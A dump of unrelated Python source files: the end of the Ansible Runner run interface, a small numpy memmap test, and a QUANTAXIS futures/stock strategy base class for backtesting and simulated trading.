:param resource_profiling_results_dir: Directory where profiling data files should be saved (defaults to profiling_data folder inside private data dir)
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param omit_event_data: Omits extra ansible event data from event payload (stdout and event still included)
:param only_failed_event_data: Omits extra ansible event data unless it's a failed event (stdout and event still included)
:param cli_execenv_cmd: Tells Ansible Runner to emulate the CLI of Ansible by prepping an Execution Environment and then passing the user provided cmdline
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type cmdline: str
:type limit: str
:type forks: int
:type quiet: bool
:type verbosity: int
:type streamer: str
:type _input: file
:type _output: file
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type resource_profiling: bool
:type resource_profiling_base_cgroup: str
:type resource_profiling_cpu_poll_interval: float
:type resource_profiling_memory_poll_interval: float
:type resource_profiling_pid_poll_interval: float
:type resource_profiling_results_dir: str
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:type omit_event_data: bool
:type only_failed_event_data: bool
:type cli_execenv_cmd: str
:returns: A :py:class:`ansible_runner.runner.Runner` object, or a simple object containing `rc` if run remotely
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
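# A minimal usage sketch (the directory and playbook names are assumptions): run()
# blocks until the playbook finishes and returns the Runner, while run_async()
# returns the worker thread together with the Runner so the caller can poll it.
#
#   import ansible_runner
#
#   r = ansible_runner.run(private_data_dir='/tmp/demo', playbook='site.yml')
#   print(r.status, r.rc)                      # e.g. 'successful', 0
#
#   thread, runner = ansible_runner.run_async(private_data_dir='/tmp/demo',
#                                             playbook='site.yml')
#   thread.join()                              # wait for the background run to finish
#   print(runner.status)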
|
test_memmap.py
|
# -*- coding: utf-8 -*-
# ================================================================
# Don't go gently into that good night.
#
# author: klaus
# description:
#
# ================================================================
import multiprocessing
import numpy as np
def print_matrix(filename):
matrix = np.memmap(filename, dtype="int16", mode="r", shape=(100, 100))
print(matrix)
def main():
filename = "test.dat"
matrix = np.memmap(filename, dtype="int16", mode="w+", shape=(100, 100))
matrix[0] = -2
matrix.flush()
print(matrix)
p = multiprocessing.Process(target=print_matrix, args=(filename,))
p.start()
p.join()
print(matrix)
if __name__ == "__main__":
main()
|
qactabase.py
|
import copy
import datetime
import json
import os
import re
import sys
import threading
import time
import uuid
import pandas as pd
import pymongo
import requests
import asyncio
from qaenv import (eventmq_amqp, eventmq_ip, eventmq_password, eventmq_port,
eventmq_username, mongo_ip, mongo_uri)
from QAPUBSUB.consumer import subscriber, subscriber_routing, subscriber_topic
from QAPUBSUB.producer import publisher_routing, publisher_topic
import QUANTAXIS as QA
from QAStrategy.util import QA_data_futuremin_resample
from QIFIAccount import ORDER_DIRECTION, QIFI_Account
from QUANTAXIS.QAARP import QA_Risk, QA_User
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, RUNNING_ENVIRONMENT
from QUANTAXIS.QAData.QADataStruct import QA_DataStruct_Stock_min
class QAStrategyCTABase():
def __init__(self, code='rb2005', frequence='1min', strategy_id='QA_STRATEGY', risk_check_gap=1,
portfolio='default',
start='2020-01-01', end='2020-05-21', init_cash=1000000, send_wx=False,
data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password,
trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password,
taskid=None, mongo_ip=mongo_ip, model='py'):
"""
code can be a single instrument or a list of instruments;
the market type is inferred automatically from code.
TODO: support multiple markets at the same time
self.trade_host is the IP of the eventmq where the exchange lives [the one hosting ORDER_ROUTER]
"""
self.username = 'admin'
self.password = 'admin'
self.trade_host = trade_host
self.code = code
self.frequence = frequence
self.strategy_id = strategy_id
self.portfolio = portfolio
self.data_host = data_host
self.data_port = data_port
self.data_user = data_user
self.data_password = data_password
self.trade_host = trade_host
self.trade_port = trade_port
self.trade_user = trade_user
self.trade_password = trade_password
self.start = start
self.end = end
self.init_cash = init_cash
self.taskid = taskid
self.running_time = ''
self.market_preset = QA.QAARP.MARKET_PRESET()
self._market_data = []
self.risk_check_gap = risk_check_gap
self.latest_price = {}
self.isupdate = False
self.model = model
self.new_data = {}
self._systemvar = {}
self._signal = []
self.send_wx = send_wx
if isinstance(self.code, str):
self.last_order_towards = {self.code: {'BUY': '', 'SELL': ''}}
else:
self.last_order_towards = dict(
zip(self.code, [{'BUY': '', 'SELL': ''} for i in range(len(self.code))]))
self.dt = ''
if isinstance(self.code, str):
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-Z]+', self.code) else MARKET_TYPE.STOCK_CN
else:
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-Z]+', self.code[0]) else MARKET_TYPE.STOCK_CN
self.bar_order = {'BUY_OPEN': 0, 'SELL_OPEN': 0,
'BUY_CLOSE': 0, 'SELL_CLOSE': 0}
self._num_cached = 120
self._cached_data = []
self.user_init()
# live-trading parameters
self.stop_actual_thread = True
self.actual_thread: threading.Thread = None
self.stock_name = 'stock_name_un_set'
@property
def bar_id(self):
return len(self._market_data)
@property
def BarsSinceEntryLong(self):
return self.bar_id - self.bar_order.get('BUY_OPEN', self.bar_id)
@property
def BarsSinceEntryShort(self):
return self.bar_id - self.bar_order.get('SELL_OPEN', self.bar_id)
@property
def EntryPriceLong(self):
code = self.get_code()
return self.get_positions(code).open_price_long
@property
def EntryPriceShort(self):
code = self.get_code()
return self.get_positions(code).open_price_short
def on_sync(self):
if self.running_mode != 'backtest':
self.pubacc.pub(json.dumps(self.acc.message),
routing_key=self.strategy_id)
def _debug_sim(self):
self.running_mode = 'sim'
if self.frequence.endswith('min'):
if isinstance(self.code, str):
self._old_data = QA.QA_fetch_get_future_min('tdx', self.code.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()),
self.frequence)[:-1].set_index(['datetime', 'code'])
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low',
'close', 'volume']]
else:
self._old_data = pd.concat([QA.QA_fetch_get_future_min('tdx', item.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()),
self.frequence)[:-1].set_index(
['datetime', 'code']) for item in self.code], sort=False)
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low',
'close', 'volume']]
else:
self._old_data = pd.DataFrame()
self.database = pymongo.MongoClient(mongo_ip).QAREALTIME
self.client = self.database.account
self.subscriber_client = self.database.subscribe
self.acc = QIFI_Account(
username=self.strategy_id, password=self.strategy_id, trade_host=mongo_ip, init_cash=self.init_cash)
self.acc.initial()
self.acc.on_sync = self.on_sync
self.pub = publisher_routing(exchange='QAORDER_ROUTER', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
self.pubacc = publisher_topic(exchange='QAAccount', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
if isinstance(self.code, str):
self.subscribe_data(self.code.lower(), self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
else:
self.subscribe_multi(self.code, self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
print('account {} start sim'.format(self.strategy_id))
self.database.strategy_schedule.job_control.update(
{'strategy_id': self.strategy_id},
{'strategy_id': self.strategy_id, 'taskid': self.taskid,
'filepath': os.path.abspath(__file__), 'status': 200}, upsert=True)
def debug_actual(self):
print(f'{self.code} enter debug actual: start live-trading debugging.')
self.actual_thread = threading.Thread(target=self.run_actual_sim_loop, daemon=True)
self.actual_thread.start()
self.actual_thread.join()
def loop_actual_tick(self):
last_ts = self.actual_tick_check()
async def loop_actual_async(self):
print(f'{self.code} enter debug actual: start asyncio live trading.')
await self.run_async_actual_loop()
async def run_async_actual_loop(self):
self.stop_actual_thread = False
self.ready_sleep = 1
while not self.stop_actual_thread:
# print(f'{self.code} qa cta base run loop. {"Daemon" if self.actual_thread.isDaemon() else "not Daemon"} Thread.')
last_ts = self.actual_tick_check()
now_ts = datetime.datetime.now()
timedelta = last_ts + datetime.timedelta(minutes=5) - now_ts
#
if timedelta > datetime.timedelta(seconds=5):
self.ready_sleep = timedelta.seconds - 3
else:
self.ready_sleep = 1
# outside trading hours (before 09:05 or after 15:10), sleep until 09:05 the next day
if datetime.time(hour=9, minute=5) > now_ts.time() or now_ts.time() > datetime.time(hour=15, minute=10):
next_wakeup_time = datetime.datetime.combine(now_ts.date() + datetime.timedelta(days=1), datetime.time(hour=9, minute=5))
self.ready_sleep = (next_wakeup_time - now_ts).seconds
print(f'{datetime.datetime.now()} {self.code} ready sleep {self.ready_sleep}')
await asyncio.sleep(self.ready_sleep)
def run_actual_sim_loop(self):
self.stop_actual_thread = False
self.ready_sleep = 1
while not self.stop_actual_thread:
# print(f'{self.code} qa cta base run loop. {"Daemon" if self.actual_thread.isDaemon() else "not Daemon"} Thread.')
last_ts = self.actual_tick_check()
now_ts = datetime.datetime.now()
timedelta = last_ts + datetime.timedelta(minutes=5) - now_ts
#
if timedelta > datetime.timedelta(seconds=5):
self.ready_sleep = timedelta.seconds - 3
else:
self.ready_sleep = 1
# outside trading hours (before 09:05 or after 15:10), sleep for 10 minutes
if datetime.time(hour=9, minute=5) > now_ts.time() or now_ts.time() > datetime.time(hour=15, minute=10):
self.ready_sleep = 60 * 10
print(f'{datetime.datetime.now()} {self.code} ready sleep {self.ready_sleep}')
time.sleep(self.ready_sleep)
def actual_tick_check(self):
if len(self._market_data) == 0:
return
last_index = self.market_data.index[-1]
code = last_index[1]
last_timestamp = last_index[0]
# get the current time
now_timestamp = datetime.datetime.now()
now_str = str(now_timestamp)[:19]
# print(f'current instrument code is {self.code}')
# print(f'{now_str}: timestamp of the last bar for this instrument is {last_timestamp}')
res = QA.QAFetch.QATdx.QA_fetch_get_stock_min(code, last_timestamp, now_str, '5min')
res = res.rename(columns={"vol": "volume"})
# .drop(
# ['date', 'datetime', 'date_stamp', 'time_stamp'], axis=1)
# res.index = pd.to_datetime(res.index)
res = QA_DataStruct_Stock_min(res.set_index(['datetime', 'code']))
apply_data: QA_DataStruct_Stock_min = res
apply_df: pd.DataFrame = apply_data.data
# drop redundant rows here, e.g. duplicated timestamps or bars whose timestamp has not arrived yet.
drop_index = []
cut_timestamp = now_timestamp - datetime.timedelta(hours=3)
cut_str = str(cut_timestamp)[:19]
cut_str = now_str
for index, row in apply_df.iterrows():
str_index_ts = str(last_index[0])
if index[0] <= str_index_ts or index[0] > cut_str:
drop_index.append(index)
else:
# print(f'{self.code} fetch new data with timestamp {index[0]}')
pass
apply_df = apply_df.drop(index=drop_index)
# print(data)
# fetch the latest timestamp again
apply_df.apply(self.x1, axis=1)
last_index = self.market_data.index[-1]
code = last_index[1]
last_timestamp = last_index[0]
if isinstance(last_timestamp, str):
last_timestamp = datetime.datetime.strptime(last_timestamp, '%Y-%m-%d %H:%M:%S')
return last_timestamp
def debug_sim(self):
self._debug_sim()
threading.Thread(target=self.sub.start, daemon=True).start()
def run_sim(self):
self._debug_sim()
self.sub.start()
def run_backtest(self):
self.debug()
self.acc.save()
risk = QA_Risk(self.acc)
risk.save()
try:
"""add rank flow if exist
QARank是我们内部用于评价策略ELO的库 此处并不影响正常使用
"""
from QARank import QA_Rank
QA_Rank(self.acc).send()
except:
pass
def user_init(self):
"""
User-defined init procedure; override in subclasses.
"""
pass
def debug(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type, frequence=self.frequence)
self.positions = self.acc.get_position(self.code)
print(self.acc)
print(self.acc.market_type)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
data.data.apply(self.x1, axis=1)
def x1(self, item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print(f'backtest: Settle! {self.code} {str(item.name[0])[0:10]}')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
def debug_t0(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, init_hold={
self.code: 100000},
market_type=self.market_type, running_environment=RUNNING_ENVIRONMENT.TZERO)
self.positions = self.acc.get_position(self.code)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
for order in self.acc.close_positions_order:
order.trade('closebySys', order.price,
order.amount, order.datetime)
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print('backtest: Settle!')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.data.apply(x1, axis=1)
def debug_currenttick(self, freq):
data = QA.QA_fetch_get_future_transaction_realtime(
'tdx', self.code.upper())
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'currenttick_{}_{}'.format(str(datetime.date.today()), freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price / 1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def debug_histick(self, freq):
data = QA.QA_fetch_get_future_transaction(
'tdx', self.code.upper(), self.start, self.end)
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'histick_{}_{}_{}'.format(self.start, self.end, freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price / 1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def subscribe_data(self, code, frequence, data_host, data_port, data_user, data_password, model='py'):
"""[summary]
Arguments:
code {[type]} -- [description]
frequence {[type]} -- [description]
"""
if frequence.endswith('min'):
if model == 'py':
self.sub = subscriber(exchange='realtime_{}_{}'.format(
frequence, code), host=data_host, port=data_port, user=data_user, password=data_password)
elif model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
code), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.callback
elif frequence.endswith('s'):
import re
self._num_cached = 2 * int(re.findall(r'\d+', self.frequence)[0])
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.second_callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.tick_callback
def subscribe_multi(self, codelist, frequence, data_host, data_port, data_user, data_password, model='py'):
if frequence.endswith('min'):
if model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0]), routing_key=frequence, host=data_host, port=data_port, user=data_user,
password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item), routing_key=frequence)
elif model == 'py':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0].lower()), routing_key=frequence, host=data_host, port=data_port, user=data_user,
password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item.lower()), routing_key=frequence)
self.sub.callback = self.callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(exchange='CTPX', routing_key=codelist[0].lower(
), host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='CTPX', routing_key=item.lower())
self.sub.callback = self.tick_callback
@property
def old_data(self):
return self._old_data
def update(self):
"""
Hook invoked at the point where the bar switches.
"""
self._old_data = self._market_data
self._on_1min_bar()
@property
def market_datetime(self):
"""计算的market时间点 此api慎用 因为会惰性计算全市场的值
Returns:
[type] -- [description]
"""
return self.market_data.index.levels[0]
@property
def market_data(self):
if self.running_mode == 'sim':
return self._market_data
elif self.running_mode == 'backtest':
return pd.concat(self._market_data[-100:], axis=1, sort=False).T
def force_close(self):
# force-close all open positions
if self.positions.volume_long > 0:
self.send_order('SELL', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_long)
if self.positions.volume_short > 0:
self.send_order('BUY', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_short)
def upcoming_data(self, new_bar):
"""upcoming_bar :
在这一步中, 我们主要进行的是
1. 更新self._market_data
2. 更新账户
3. 更新持仓
4. 通知on_bar
Arguments:
new_bar {pd.DataFrame} -- [description]
"""
code = new_bar.index.levels[1][0]
if len(self._old_data) > 0:
self._market_data = pd.concat(
[self._old_data, new_bar], sort=False)
else:
self._market_data = new_bar
# QA.QA_util_log_info(self._market_data)
if self.isupdate:
self.update()
self.isupdate = False
self.update_account()
if isinstance(self.code, str):
self.positions.on_price_change(float(self.latest_price[code]))
else:
for item in self.code:
self.acc.get_position(item).on_price_change(
float(self.latest_price[code]))
self.on_bar(json.loads(
new_bar.reset_index().to_json(orient='records'))[0])
def ind2str(self, ind, ind_type):
z = ind.tail(1).reset_index().to_dict(orient='records')[0]
return json.dumps({'topic': ind_type, 'code': self.code, 'type': self.frequence, 'data': z})
def second_callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
second ==> 2*second tick
b'{"ask_price_1": 4145.0, "ask_price_2": 0, "ask_price_3": 0, "ask_price_4": 0, "ask_price_5": 0,
"ask_volume_1": 69, "ask_volume_2": 0, "ask_volume_3": 0, "ask_volume_4": 0, "ask_volume_5": 0,
"average_price": 61958.14258714826,
"bid_price_1": 4143.0, "bid_price_2": 0, "bid_price_3": 0, "bid_price_4": 0, "bid_price_5": 0,
"bid_volume_1": 30, "bid_volume_2": 0, "bid_volume_3": 0, "bid_volume_4": 0, "bid_volume_5": 0,
"datetime": "2019-11-20 01:57:08", "exchange": "SHFE", "gateway_name": "ctp",
"high_price": 4152.0, "last_price": 4144.0, "last_volume": 0,
"limit_down": 3872.0, "limit_up": 4367.0, "local_symbol": "ag1912.SHFE",
"low_price": 4105.0, "name": "", "open_interest": 277912.0, "open_price": 4140.0,
"preSettlementPrice": 4120.0, "pre_close": 4155.0,
"symbol": "ag1912",
"volume": 114288}'
ticks are updated/resampled based on the hot-data cache size self._num_cached
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self._cached_data.append(self.new_data)
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
# if len(self._cached_data) == self._num_cached:
# self.isupdate = True
if len(self._cached_data) > 3 * self._num_cached:
# cap the amount of cached data
self._cached_data = self._cached_data[self._num_cached:]
data = pd.DataFrame(self._cached_data).loc[:, [
'datetime', 'last_price', 'volume']]
data = data.assign(datetime=pd.to_datetime(data.datetime)).set_index('datetime').resample(
self.frequence).apply({'last_price': 'ohlc', 'volume': 'last'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.assign(volume=data.volume.diff(),
code=self.new_data['symbol'])
data = data.reset_index().set_index(['datetime', 'code'])
self.acc.on_price_change(
self.new_data['symbol'], self.latest_price[self.new_data['symbol']])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
self.running_time = self.new_data['datetime']
# print(data.iloc[-1].index[0])
if self.dt != data.index[-1][0]:
self.isupdate = True
self.dt = data.index[-1][0]
self.upcoming_data(data.tail(1))
def tick_callback(self, a, b, c, body):
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
self.running_time = self.new_data['datetime']
self.on_tick(self.new_data)
def get_code_marketdata(self, code):
return self.market_data.loc[(slice(None), code), :]
def get_current_marketdata(self):
return self.market_data.loc[(self.running_time, slice(None)), :]
def callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['code']] = self.new_data['close']
if self.dt != str(self.new_data['datetime'])[0:16]:
# [0:16] is the number of characters in a minute-bar timestamp
self.dt = str(self.new_data['datetime'])[0:16]
self.isupdate = True
self.acc.on_price_change(self.new_data['code'], self.new_data['close'])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
bar = pd.DataFrame([self.new_data]).set_index(['datetime', 'code'])
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
# res = self.job_control.find_one(
# {'strategy_id': self.strategy_id, 'strategy_id': self.strategy_id})
# self.control_status(res)
self.running_time = self.new_data['datetime']
self.upcoming_data(bar)
def control_status(self, res):
print(res)
def add_subscriber(self, qaproid):
"""Add a subscriber
Record the subscriber's QAPRO_ID.
"""
self.subscriber_client.insert_one(
{'strategy_id': self.strategy_id, 'user_id': qaproid})
@property
def subscriber_list(self):
"""订阅者
Returns:
[type] -- [description]
"""
return list(set([item['user_id'] for item in self.subscriber_client.find({'strategy_id': self.strategy_id})]))
def load_strategy(self):
raise NotImplementedError
def on_dailyopen(self):
pass
def on_dailyclose(self):
pass
def on_bar(self, bar):
raise NotImplementedError
def on_tick(self, tick):
raise NotImplementedError
def _on_1min_bar(self):
# raise NotImplementedError
if len(self._systemvar.keys()) > 0:
self._signal.append(copy.deepcopy(self._systemvar))
try:
self.on_1min_bar()
except:
pass
def on_deal(self, order):
"""
order is a dict type
"""
print('------this is on deal message ------')
print(order)
def on_1min_bar(self):
raise NotImplementedError
def on_5min_bar(self):
raise NotImplementedError
def on_15min_bar(self):
raise NotImplementedError
def on_30min_bar(self):
raise NotImplementedError
def order_handler(self):
self._orders = {}
def daily_func(self):
QA.QA_util_log_info('DAILY FUNC')
def risk_check(self):
pass
def plot(self, name, data, format):
""" plot是可以存储你的临时信息的接口, 后期会接入可视化
Arguments:
name {[type]} -- [description]
data {[type]} -- [description]
format {[type]} -- [description]
"""
self._systemvar[name] = {'datetime': copy.deepcopy(str(
self.running_time)), 'value': data, 'format': format}
def get_code(self):
if isinstance(self.code, str):
return self.code
else:
return self.code[0]
def check_order(self, direction, offset, code=None):
"""[summary]
Do not open another position in the same direction; this restriction only applies to the futures market.
buy - open
sell - close
"""
if code is None:
code = self.get_code()
if self.market_type == QA.MARKET_TYPE.FUTURE_CN:
if self.last_order_towards[code][direction] == str(offset):
return False
else:
return True
else:
return True
def on_ordererror(self, direction, offset, price, volume):
print('order Error ')
def receive_simpledeal(self,
code: str,
trade_time,
trade_amount,
direction,
offset,
trade_price,
message='sell_open'):
self.send_order(direction=direction, offset=offset,
volume=trade_amount, price=trade_price, order_id=QA.QA_util_random_with_topic(self.strategy_id))
def send_order(self, direction='BUY', offset='OPEN', price=3925, volume=10, order_id='', code=None):
if code is None:
code = self.get_code()
if offset == '':
towards = getattr(ORDER_DIRECTION, direction)
else:
towards = getattr(ORDER_DIRECTION, '{}_{}'.format(direction, offset))
order_id = str(uuid.uuid4()) if order_id == '' else order_id
if isinstance(price, float):
pass
elif isinstance(price, pd.Series):
price = price.values[0]
if self.running_mode == 'sim':
# intercept orders here that could not be filled
if (direction == 'BUY' and self.latest_price[code] <= price) or (
direction == 'SELL' and self.latest_price[code] >= price):
QA.QA_util_log_info(
'============ {} SEND ORDER =================='.format(order_id))
QA.QA_util_log_info('direction{} offset {} price{} volume{}'.format(
direction, offset, price, volume))
if self.check_order(direction, offset, code=code):
# self.last_order_towards = {'BUY': '', 'SELL': ''}
self.last_order_towards[code][direction] = offset
now = str(datetime.datetime.now())
order = self.acc.send_order(
code=code, towards=towards, price=price, amount=volume, order_id=order_id)
print(order)
order['topic'] = 'send_order'
self.pub.pub(
json.dumps(order), routing_key=self.strategy_id)
self.acc.make_deal(order)
self.on_deal(order)
self.bar_order['{}_{}'.format(
direction, offset)] = self.bar_id
if self.send_wx:
for user in self.subscriber_list:
QA.QA_util_log_info(self.subscriber_list)
try:
requests.post(
'http://www.yutiansut.com/signal?user_id={}&template={}&strategy_id={}&realaccount={}&code={}&order_direction={}&order_offset={}&price={}&volume={}&order_time={}'.format(
user, "xiadan_report", self.strategy_id, self.acc.user_id, code.lower(),
direction, offset, price, volume, now))
except Exception as e:
QA.QA_util_log_info(e)
else:
QA.QA_util_log_info('failed in ORDER_CHECK')
else:
self.on_ordererror(direction, offset, price, volume)
elif self.running_mode == 'backtest':
self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id
if self.market_type == 'stock_cn':
order = self.acc.send_order(
code=code, amount=volume, time=self.running_time, towards=towards, price=price)
order.trade(order.order_id, order.price,
order.amount, order.datetime)
self.on_deal(order.to_dict())
else:
self.acc.receive_simpledeal(
code=code, trade_time=self.running_time, trade_towards=towards, trade_amount=volume,
trade_price=price, order_id=order_id, realorder_id=order_id, trade_id=order_id)
self.on_deal({
'code': code,
'trade_time': self.running_time,
'trade_towards': towards,
'trade_amount': volume,
'trade_price': price,
'order_id': order_id,
'realorder_id': order_id,
'trade_id': order_id
})
self.positions = self.acc.get_position(code)
def update_account(self):
if self.running_mode == 'sim':
QA.QA_util_log_info('{} UPDATE ACCOUNT'.format(
str(datetime.datetime.now())))
self.accounts = self.acc.account_msg
self.orders = self.acc.orders
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
self.trades = self.acc.trades
self.updatetime = self.acc.dtstr
self.on_sync()
elif self.running_mode == 'backtest':
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
def get_exchange(self, code):
return self.market_preset.get_exchange(code)
def get_positions(self, code):
if self.running_mode == 'sim':
self.update_account()
return self.acc.get_position(code)
elif self.running_mode == 'backtest':
return self.acc.get_position(code)
def get_cash(self):
if self.running_mode == 'sim':
self.update_account()
return self.accounts.get('available', '')
elif self.running_mode == 'backtest':
return self.acc.cash_available
def run(self):
while True:
time.sleep(self.risk_check_gap)
self.risk_check()
if __name__ == '__main__':
QAStrategyCTABase(code='rb2005').run()
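# A minimal subclass sketch (the trading rule and threshold are illustrative only):
# on_bar() is the required override, and send_order() is how the base class routes
# orders in both sim and backtest modes.
#
#   class MyStrategy(QAStrategyCTABase):
#       def on_bar(self, bar):
#           # buy-open one lot when the close crosses an assumed threshold
#           if bar['close'] > 3500 and self.positions.volume_long == 0:
#               self.send_order('BUY', 'OPEN', price=bar['close'], volume=1)
#
#   MyStrategy(code='rb2005', frequence='1min', start='2020-01-01',
#              end='2020-05-21').run_backtest()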
|
commandsocket.py
|
